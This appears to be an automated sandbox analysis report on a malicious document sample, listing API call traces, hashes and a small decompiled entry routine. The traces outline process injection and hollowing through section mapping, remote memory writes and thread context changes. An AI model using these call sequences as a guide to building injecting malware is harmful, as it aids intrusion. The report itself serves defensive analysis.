    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}


APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 12
  • API ID: GetModuleFileName$GetLastError
  • String ID:
  • API String ID: 3709004705-0
  • Opcode ID: d4f5095c8902255d58a9495724da3ecc245ace53255d050a18a8176b02be640e
  • Instruction ID: 1c819d795f5758a75cc16c79d532b1e89c3ae16fe89f2260c6209db603419fff
  • Opcode Fuzzy Hash: 22D02B840B9C0AC30C4360859068B1563D10F11185B8879835744B07BF3F1130DFE75D
  • Instruction Fuzzy Hash: 1c819d795f5758a75cc16c79d532b1e89c3ae16fe89f2260c6209db603419fff
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
  • GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
  • GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:B6EECE7B4FD1B4BD2626AA07E17DA9DE
Total matches:35
Initial Analysis Report:Open
Initial sample Analysis ID:60981
Initial sample SHA 256:93E3B205BA5588173BA0C1C9E6CDD1BABA4EC461E498986DC9851FAC67FA9346
Initial sample name:Request_592655.doc

Similar Executed Functions

Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
